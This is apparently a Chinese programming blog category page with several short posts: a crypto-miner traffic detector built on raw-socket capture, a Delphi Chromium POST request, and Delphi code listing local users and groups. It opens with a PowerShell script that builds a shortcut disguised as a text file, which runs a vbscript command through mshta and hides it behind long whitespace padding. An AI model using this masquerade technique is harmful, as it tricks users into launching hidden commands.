分类 编程 下的文章

lnk的一个玩法。

$Shell = New-Object -ComObject WScript.Shell
$Dir = Split-Path -Parent $MyInvocation.MyCommand.Definition
$Shortcut = $Shell.CreateShortcut("$Dir\test.txt.lnk")
$Shortcut.TargetPath = "%Windir%\System32\mshta.exe"
$Shortcut.IconLocation = "shell32.dll,70"
$Shortcut.Arguments ='                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               vbscript:CreateObject("WScript.Shell").Run("cmd.exe",5)(window.close)'

$Shortcut.Save()



保存为.ps1然后用PowerShell运行

生成一个test.lnk 图标样式为txt

利用SIO_RCVALL捕获数据来简单查找挖矿木马

只做简单得技术研究,不保证百分百好用。

WSAStartup(MAKEWORD(2, 2), &wsa);
hSniffer = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

LocalAddr.sin_family = AF_INET;
LocalAddr.sin_port = 0;
LocalAddr.sin_addr.s_addr = INADDR_NONE;
bind(hSniffer, (struct sockaddr *)&LocalAddr, sizeof(sockaddr_in));
//初始化并绑定Socket举报到本机IP

DWORD sioarg = 1;
DWORD dwValue = 0;
WSAIoctl(hSniffer, SIO_RCVALL, &sioarg, sizeof(DWORD), 0, 0, (LPDWORD)&dwValue, 0, 0);
//使用SIO_RCVALL命令开始捕获

char *Buffer = (char *)malloc(65536);
IPV4_HDR *IPHeader;
TCP_HDR *TCPHeader;
char *lpszStr;

recvfrom(hSniffer, Buffer, 65536, 0, 0, 0);
IPHeader = (IPV4_HDR *)Buffer;
if (IPHeader->ip_protocol == 6) { //判断是否是TCP协议
    TCPHeader = (TCP_HDR*)(Buffer + IPHeader->ip_header_len * 4); //计算偏移定位TCP头
    lpszStr = (char *)(TCPHeader + iLen + TCPHeader->data_offset * 4); //计算数据包得偏移地址
}

//lpszStr 即为TCP数据包得内容

然后挖矿程序得数据包一般为以下格式(注:不保证完全):

{"jsonrpc":"2.0","method":"job","params":{"blob":"01009580fdd4055331f01c7f3a7c15f1d88ae82f82a862e88f854856bc05758100696a96c7475300000000522ab3a142b4935c04121364c53b36266999330985c21c61f234ffd0cdcbbe1e01","job_id":"771459633298218","target":"d8a30200"}}


{"id":3396,"jsonrpc":"2.0","method":"submit","params":{"id":"399161462602205","job_id":"794963340135291","nonce":"74a999d9","result":"13e887bf1e58ad20337f8da518d7abebcc449d754db036bbcfbe4ac9ca0a0000"}}


{"method": "submit", "params": {"id": "341404656460508", "job_id": "771459633298218", "nonce": "ef430500", "result": "4290fef7f43c544c2baebeaa6ce1a459f29cb03afef69517f33acf64237d0200"}, "id":4}


{"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}


通过提取关键字来与捕获得TCP数据包内容进行匹配,当数据包中存在以上固定特征后,可通过IPV4头以及TCP协议头中的IP地址字段及端口字段在GetExtendedTcpTable获取到得TCP链接状态链表中查找,pTcpTable->table[?].dwOwningPid 即为相关进程得PID。



另外如果是挖矿程序作者原版得程序一般都会有命令行参数或者在EXE同目录存在config.json文件,我们也可以通过获取进程命令行参数来加以判断。

Chromium Post

var
  Header: ICefStringMultimap;
  Data: ICefPostData;
  Request: ICefRequest;begin
  Request := TCefRequestRef.New;
  Request.Url := 'http://example.com/';
  Request.Method := 'POST';
  Request.Flags := WUR_FLAG_NONE;

  Header := TCefStringMultimapOwn.Create;
  Header.Append('Content-Type', 'application/x-www-form-urlencoded');
  Request.SetHeaderMap(Header);

  Data := TCefPostDataRef.New;
  Data.AddElement(CreateField('Data.id=27'));
  Data.AddElement(CreateField('&Data.title=title'));
  Data.AddElement(CreateField('&Data.body=body'));
  Request.PostData := Data;

  Chromium1.Browser.MainFrame.LoadRequest(Request);end;


Delphi 获取Windows本地用户组和用户列表

头文件不全请加载    JEDI Windows Security Code Library 


{$POINTERMATH ON}
Function GetUserGroup():Integer;
Var
  szComputer:Array [0..MAXCHAR] Of WideChar;
  Buffer    :LPLOCALGROUP_INFO_1;
  nTotal    :DWORD;
  nEntries  :DWORD;
  hResume   :PDWORD_PTR;
  nCount    :DWORD;
  nStatus   :DWORD;
  dwPrefMax :DWORD;
  lpszStr   :Array [0..MAX_PATH] Of WideChar;
  iLen      :Integer;
  iFull     :Integer;
begin
  Result   := 0;
  nEntries := SizeOf(szComputer);
  GetComputerNameW(@szComputer, nEntries);
  nEntries   := 0;
  nTotal     := 0;
  Buffer     := Nil;
  dwPrefMax  := MAX_PREFERRED_LENGTH;
  hResume    := Nil;

  Writeln('User Group:', szComputer);
  nStatus    := NetLocalGroupEnum(szComputer, 0, PByte(Buffer), dwPrefMax, @nEntries, @nTotal, @hResume);
  if (nStatus = S_OK) Or (nStatus = ERROR_MORE_DATA) then
  begin
    for nCount := 0 to nTotal-1 do
    begin
      Inc(Result);
      if Buffer[nCount].lgrpi1_comment = Nil then Break;

      iLen := lstrlenW(Buffer[nCount].lgrpi1_comment);
      iFull:= 40 - Min(iLen, 32);
      ZeroMemory(@lpszStr, SizeOf(lpszStr));
      FillSpaces(@lpszStr, 10, True);

      lstrcatW(lpszStr, Buffer[nCount].lgrpi1_comment);
      FillSpaces(@lpszStr[iLen + 10], iFull, True);

      lstrcatW(lpszStr, Buffer[nCount].lgrpi1_name);

      Writeln(lpszStr);
    end;
  end;

  if Buffer <> Nil then
    NetApiBufferFree(Buffer);

  Writeln('.Done!, Total: ', Result);
end;


Function GetUsers():Integer;
Var
  szComputer:Array [0..MAXCHAR] Of WideChar;
  Buffer    :PUserInfo3;
  nTotal    :DWORD;
  nEntries  :DWORD;
  hResume   :PDWORD_PTR;
  nCount    :DWORD;
  dwPrefMax :DWORD;
  nStatus   :DWORD;
  lpszStr   :Array [0..MAX_PATH] Of WideChar;
begin
  Result   := 0;
  nEntries := SizeOf(szComputer);
  GetComputerNameW(@szComputer, nEntries);
  nEntries   := 0;
  nTotal     := 0;

  nEntries   := 0;
  nTotal     := 0;
  Buffer     := Nil;
  dwPrefMax  := MAX_PREFERRED_LENGTH;
  hResume    := Nil;

  Writeln('User Group:', szComputer);
  nStatus    := NetUserEnum(szComputer, 3, FILTER_NORMAL_ACCOUNT, PByte(Buffer), dwPrefMax, @nEntries, @nTotal, @hResume);
  if (nStatus = S_OK) Or (nStatus = ERROR_MORE_DATA) then
  begin
    for nCount := 0 to nTotal-1 do
    begin
      Inc(Result);
      if Buffer[nCount].usri3_name = Nil then
      begin
        if nCount < nTotal then
        begin
          Continue;
        end Else Break;
      end;

      ZeroMemory(@lpszStr, SizeOf(lpszStr));
      FillSpaces(@lpszStr, 10, True);
      lstrcatW(lpszStr, Buffer[nCount].usri3_name);
      Writeln(lpszStr, #13);

      ZeroMemory(@lpszStr, SizeOf(lpszStr));
      FillSpaces(@lpszStr, 15, True);
      lstrcatW(lpszStr, 'Remarks:');
      lstrcatW(lpszStr, Buffer[nCount].usri3_comment);
      Writeln(lpszStr);

      ZeroMemory(@lpszStr, SizeOf(lpszStr));
      FillSpaces(@lpszStr, 15, True);
      lstrcatW(lpszStr, 'Privilege:');
      if Buffer[nCount].usri3_priv = 0 then
      begin
        lstrcatW(lpszStr, 'Guest');
      end Else
      if Buffer[nCount].usri3_priv = 1 then
      begin
        lstrcatW(lpszStr, 'User');
      end Else
      if Buffer[nCount].usri3_priv = 2 then
      begin
        lstrcatW(lpszStr, 'Admin');
      end Else
      begin
        lstrcatW(lpszStr, 'UnKnown');
      end;
      Writeln(lpszStr);

      if (Buffer[nCount].usri3_script_path <> Nil) And (lstrlenW(Buffer[nCount].usri3_script_path) > 0) then
      begin
        ZeroMemory(@lpszStr, SizeOf(lpszStr));
        FillSpaces(@lpszStr, 15, True);
        lstrcatW(lpszStr, 'Login Script:');
        lstrcatW(lpszStr, Buffer[nCount].usri3_script_path);
        Writeln(lpszStr);
      end;
      Writeln('');
    end;
  end;
  if Buffer <> Nil then
    NetApiBufferFree(Buffer);

  Writeln('.Done!, Total: ', Result);
end;